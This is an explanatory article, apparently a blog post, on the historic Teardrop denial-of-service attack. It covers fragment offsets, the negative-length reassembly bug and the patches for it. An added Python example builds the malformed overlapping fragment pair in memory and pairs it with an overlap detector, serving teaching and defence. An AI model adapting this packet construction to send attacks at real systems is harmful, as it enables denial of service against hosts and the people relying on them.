Teardrop Attack

What Is It And How Does It Work?

Despite what the name might suggest, the Teardrop attack does not wear a target down gradually. It is a denial-of-service (DoS) attack in which a small number of deliberately malformed IP fragments is sent to a target machine; a bug in the target's fragment reassembly code then crashes or hangs it. No flood of traffic is needed: a single pair of overlapping fragments is enough.

The fragments are crafted so that their offsets overlap in a way the victim's IP stack cannot handle. The fault lies in the TCP/IP stack's fragment reassembly, not in the network. Affected systems include Windows 3.1, Windows 95 and Windows NT, and Linux kernels prior to 2.0.32 and 2.1.63.

Teardrop is a program that sends IP fragments to a machine connected to the Internet or a network. It exploits an overlapping IP fragment bug present in Windows 95, Windows NT and Windows 3.1 machines, and in the unpatched Linux kernels listed above. The bug causes the TCP/IP fragment reassembly code to mishandle the case where a later fragment starts inside an earlier one and ends before the earlier one ends: when the code trims away the overlap it computes a negative fragment length, which is then used as an unsigned size in a memory copy and corrupts kernel memory. The machine does not fall over because fragments pile up in a buffer; it falls over because one malformed reassembly corrupts memory. The attack has not been shown to cause lasting damage to systems, and a simple reboot is the usual remedy. It should be noted, though, that while the attack is considered non-destructive, any unsaved data in open applications is lost when the machine goes down, so the primary consequence is data loss.

How does the Teardrop attack work?

Here, I am taking a reference from Juniper's technical publication to illustrate how it works.

As the above figure of the IP header shows (the IP header operates at the network layer), the header contains an identification field, a flags field and a 13-bit fragment offset field. These three fields are what the receiver uses to reassemble fragments.

Teardrop Attack and Fragment Offset:

Understand it like this: when a datagram larger than the path's maximum transmission unit is sent across the Internet, it is broken into smaller fragments. Every fragment of the same datagram carries the same identification value, and each carries a fragment offset, expressed in units of 8 bytes, that says where its payload belongs in the original datagram; all fragments except the last have the More Fragments flag set. When the fragments reach the receiving end, the receiver uses the offset field to place each one and reproduce the original data.

In the Teardrop attack, however, the attacker chooses the fragment offset and length of the second fragment so that it lies inside the first: it starts after the first fragment's start but ends before the first fragment's end. The victim's reassembly code trims the overlap, computes a negative length for the fragment, and crashes while copying it. Modern operating systems and networking devices check fragments for exactly this inconsistency; once they detect an overlap, they simply drop the fragments instead of reassembling them.
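As an added example (not part of the original article, and not the original teardrop.c), the following Python builds the fragment pair described above in memory, reproduces the negative-length arithmetic of the pre-2.0.32 Linux reassembly path, and implements the overlap check a hardened stack or filtering device applies. The addresses, identification value and payload sizes are assumptions chosen to match the classic teardrop layout (first fragment 36 payload bytes at offset 0, second fragment 4 payload bytes at offset 24); nothing is sent on the network.

```python
"""Added example: constructing a Teardrop-style overlapping IPv4 fragment pair
and detecting it the way a hardened reassembler or filter does.  All packets
are constructed in memory; nothing is transmitted."""
import struct

IPV4_FIXED_HEADER = 20
MF_FLAG = 0x2000          # "More Fragments" bit in the flags/offset word
OFFSET_MASK = 0x1FFF      # 13-bit fragment offset, stored in 8-byte units
HEADER_FMT = "!BBHHHBBH4s4s"


def build_fragment(ident, offset_bytes, more_fragments, payload,
                   src=b"\x0a\x00\x00\x01", dst=b"\x0a\x00\x00\x02"):
    """Return a minimal IPv4 datagram (no options, checksum left as 0).
    Addresses are assumed sample values.  offset_bytes must be a multiple
    of 8 because the header stores offset / 8."""
    assert offset_bytes % 8 == 0
    flags_off = (MF_FLAG if more_fragments else 0) | (offset_bytes // 8)
    total_len = IPV4_FIXED_HEADER + len(payload)
    hdr = struct.pack(HEADER_FMT,
                      0x45,        # version 4, IHL 5 (20-byte header)
                      0,           # DSCP / ECN
                      total_len,
                      ident,
                      flags_off,
                      64,          # TTL
                      17,          # protocol: UDP (arbitrary for the demo)
                      0,           # header checksum omitted
                      src, dst)
    return hdr + payload


def parse_fragment(pkt):
    """Extract what reassembly needs: (ident, offset, end, more_fragments).
    offset and end are byte positions within the reassembled datagram."""
    ver_ihl, _, total_len, ident, flags_off, _, _, _, _, _ = struct.unpack(
        HEADER_FMT, pkt[:IPV4_FIXED_HEADER])
    ihl = (ver_ihl & 0x0F) * 4
    offset = (flags_off & OFFSET_MASK) * 8
    payload_len = total_len - ihl
    return ident, offset, offset + payload_len, bool(flags_off & MF_FLAG)


def legacy_trim_length(prev_end, offset, end):
    """The arithmetic the vulnerable Linux ip_defrag performed when a new
    fragment started inside the previous one: move the new fragment's start
    past the overlap, then take end - offset as its length.  With the
    Teardrop pair the second fragment ends *before* the first one does, so
    the result is negative; handed to an unsigned memcpy length it becomes
    a huge copy and the kernel crashes."""
    if offset < prev_end:
        offset = prev_end
    return end - offset


def find_overlap(fragments):
    """Hardened check: return details of the first fragment that overlaps an
    already-seen fragment of the same datagram, or None if the set is
    consistent.  Fragments are grouped by identification, like a reassembly
    queue.  A real stack would drop the whole queue on a hit."""
    by_id = {}
    for pkt in fragments:
        ident, offset, end, _mf = parse_fragment(pkt)
        for (o, e) in by_id.get(ident, []):
            if offset < e and o < end:          # half-open interval overlap
                return {"ident": ident, "new": (offset, end), "existing": (o, e)}
        by_id.setdefault(ident, []).append((offset, end))
    return None


def teardrop_pair(ident=242):
    """Constructed sample (not captured traffic): fragment 1 covers bytes
    0..36 with MF set; fragment 2 claims offset 24 but carries only 4 bytes,
    so it ends at 28, strictly inside fragment 1."""
    frag1 = build_fragment(ident, 0, True, b"A" * 36)
    frag2 = build_fragment(ident, 24, False, b"B" * 4)
    return frag1, frag2


if __name__ == "__main__":
    f1, f2 = teardrop_pair()
    _, _, end1, _ = parse_fragment(f1)
    _, off2, end2, _ = parse_fragment(f2)
    print("vulnerable length computation:", legacy_trim_length(end1, off2, end2))
    print("hardened check:", find_overlap([f1, f2]))
```

Running the block prints a length of -8 for the vulnerable path and the overlap descriptor for the hardened check; a pair of adjacent, non-overlapping fragments passes `find_overlap` with `None`.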
How can you fix this vulnerability?

If you are experiencing teardrop attacks on a Windows-based system, visit Windows Central's teardrop page or EFnet's DoS Information Page to learn how to defend against this attack; current Windows versions are not affected. If you are experiencing attacks on a Linux-based system, upgrade to kernel version 2.0.32 / 2.1.63 or later. At the network boundary, configure the firewall to drop overlapping IP fragments so that malformed fragment sets never reach the host's reassembly code.


More articles by Bhaskar B.
